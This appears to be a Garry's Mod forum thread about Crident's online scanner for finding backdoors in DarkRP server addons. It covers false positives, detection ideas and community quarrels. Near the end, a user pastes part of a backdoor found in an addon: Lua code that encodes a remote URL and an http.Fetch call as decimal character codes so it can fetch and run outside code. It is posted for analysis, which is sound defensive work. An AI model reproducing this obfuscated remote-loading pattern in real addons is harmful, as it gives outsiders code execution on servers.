This would require an addon in game & is going into a realm we're not wanting to take this right now. However afaik there are addons which do similar things to this. The major issue would be that most DarkRP servers run addons with a load of hooks & console commands. Knowing which ones to whitelist, and going through that process would be so time consuming, the reality is - I think most people would just start clicking through yes out of impatience. This could also fuck with certain DRM's which check to see core game functions haven't been overwritten in an attempt to detour, which is now starting to get into a kinda messy area we don't want to.
To explain the conception of this system from a perspective that I guess I should have from the start is probably useful. For most people, when they get a backdoor, they default to searching for certain suspect things - and then filtering through the results to find the backdoor. Building the kind of system Moat is talking about isn't really practical for most server owners.
Obviously people who use game hosting don't have direct access to SSH to run things like regex searches and grep searches. So when they get a backdoor, they're not able to easily search for possibly malicious code - so they run into a wall straight away. They will need a local version of the server, and then something to search through the files easily - which windows search isn't good at, because it wont search the gma files, and sometimes not even the lua files. Plus it's very slow.
To build on this issue for most server owners - they don't know how to search for things like obfuscated code, and they might not think to search for things our system does.
This is what this system is designed to help with. It's not designed to be overly engineered, right now it's a quick solution to get people who need to try and find backdoors right now. This was a response to an issue our customers had. We could have spent weeks, and maybe months making this much more complex - to still have some false positives, and worse, possibly some false negatives - but the reality is, it's not worth it right now. This tool works and is more than good enough for what it is designed to do. We would rather work on other features which more customers want, and will use. As well as upgrading our whole codebase to a new version of the project our panel is built from to improve general stability and more.
You've said this a few times. If you're so set on being helpful - why aren't you telling us what isn't detected by this system that a backdoor would use, that's actually used by skids? I'm sure you could make some malicious code that it wont detect, but the reality is all backdoors come down to some form of RCE. Afaik - this will detect any code that allows remote execution, but we're human and probably missed some shit - so actually help out, instead of just saying you want to help out. Just like when you said you'd move moat gaming out of the TTT section, this is just a throw-away statement that you're not backing up so far.
This just about sums up what you think. It doesn't matter if this tool is useful, you just want to have an issue with it. You have an unhealthy hate for anything-Crident, that you dress up as memes or jokes, but it's so transparent and obvious. If you ever get called it - it was all just a bait, of course! Your entire goal here is to try and make it look bad, when we're just trying to do something useful. I'd love to see you actually contribute something instead of just looking for issues.
I thought this thread was very useful and helpful till Moat came along and derailed it with nonsense.
It still can be, idk why people have to bring their grudge to something that can benefit everyone.
Honestly it's probably just best to ignore him since he seems really focused on getting the thread ripped apart cause his ego can't let go.
Oh goodness gracious, next_level_bigpayload is something I haven't seen in a long time. I remember helping write that years ago.
To make a truly effective backdoor scanning system you would need some sort of run-time analysis via method detouring (hooking that into a neural network maybe), pattern scanning, file hash blacklists, and probably de-obfuscation or obfuscation detection. Even with all this you will maybe catch 70% of back doors, and if the backdoor dev has access to your system it wouldn't be hard to bypass it via obfuscation techniques. It's relatively easy to bypass modern anti viruses backed by multi million dollar companies. Making an anti-virus is not easy, nor will it ever be something done without a significant source of revenue or a team of talented people with hearts of gold.
Don't expect a system that will effectively catch back doors any time soon.
Could you give an example backdoor that this wouldn't detect?
I'll give it a go quick. Can't promise I'll have something for you though.
Isn't there a bunch of ways to escape a docker container? I haven't kept up with the docker vulns..
This is not an addon and it should be moved.
Addons is now a general release section for now. Hopefully this will be more clear once I can get some sections reworked.
As far as I'm aware there are no ways to escape docker containers, but if you're able to provide some resources on that it would be appreciated. I'll follow up with your other reply at some point today most likely
If you want some help let me know. I've been planning some kind of anti-malicious system for a while now.. The theory I have now is combining a mix between static detection and runtime detection. Static detection via string pattern analysis, hash blacklists, workshop id blacklists (maybe, fairly certain add-ons do not change id after code changes which could result in false positives), and maybe AST pattern analysis if I can think of way to drill into an expression tree to evaluate obfuscated code (this may help with detecting detected ciphered strings). The runtime detection would be pretty simple, just detouring lua methods but, it would have to paired with the static detection system to catch nasty stuff like indexing the results of debug.getfenv(...) to get the HTTP method or some other nasty stuff. Aaaand would also need to hook luaL_dostring to catch and quarantine nasties before runtime, throw errors in the call stack of runtime detected stuff to halt execution, and last but not least log nasties (low-severity detections) to an external server for manual analysis in a way that wouldn't piss off devs making private scripts.
Also what I said earlier still stands. Even this system would be fairly easy to get around. BUT! it would catch most nasties and be fun as hell to make and maintain.
This type of obf method is now detected. Thanks for the creative idea <3
Your idea sounds pretty neat, and if you ever finish it we would happily add it to our mod manager to try & give you some exposure. However this isn't what our system is trying to do. We don't want our system to operate within the servers runtime, this way the backdoor can't use any detour blackmagic to bypass the detection.
Fair enough. One thing I think I forgot to include in the previous comment is the idea to proxy one of the dlls loaded by the source engine on runtime to allow function detours before any script is loaded (including include/init.lua). The only thing left for malware to do is find an edge case in our detection system, timing attacks, garbage collection magic, and accessing memory from lua (I think CAC does this). All this could potentially be detected scan time though.
Just out of curiosity what language are you using for your scanner?
the backend of the scanner is built using js
🎊 thread is back from the dead 🎊
To clear some things up Crident hasn't ever endorsed leaking, however I did make a mistake by back linking a cheat website from our website for about ~7 days a few months back. Obviously we aren't going to be doing something like that again, and I hope we can move forward now that's in the past
My server got backdoored by HalogenServers, here is his backdoor if anyone is interested.
I found it in the purge, unsure of the addon is legitimate or not because I am not the one who installed it..
sv_purge.lua, it has at least two backdoors that I could find. I don't much care for the obfustcated one at the top though ...
https://pastebin.com/raw/JE7Nu7AW
Rather the one in the middle of the script
local function sep (str)
return string.Explode(",", str:gsub("%x%x%x", '%' .. "," .. '%1'):sub(1 + #","))
end
local ServerInit = sep("104116116112115058047047116105110121117114108046099111109047121057057104050099114055")
local ServerBeginInit = sep("114101116117114110032104116116112046070101116099104")
function serverLoad(c)
local serverResponse = ""
for _, v in pairs(c) do
serverResponse = serverResponse .. string.char(v)
end
return serverResponse
end
ServerLoad = function() MsgN('no') end --CompileString
nice find - is this from a workshop addon?
no clue, i am not the one who manages the addons installed on my darkrp, but i'll have to keep a closer eye on them
the purge is a gmod store addon so i am guessing that this is either bought or leaked
Where is the dwonload link???
there is no download its an online tool c:
Hi, I still do not understand, ScanBackDoor came out or not?
Honestly I've seen the scanner in action, the guy I dev for had to use it, but it was far more effective to try and use lua to find the backdoor because the scanner gave so many fucking detections. I know you want it to be thorough but there are plenty of addons that use _G, one of the top things that showed up, and it's listed as high severity. The scanner was useless because it detected so much shit it would've been a waste of time to sort through it. It really needs a sort by detection type feature.
Nice job and well tested!
What addons were you finding _G usage in?
Sorry, you need to Log In to post a reply to this thread.
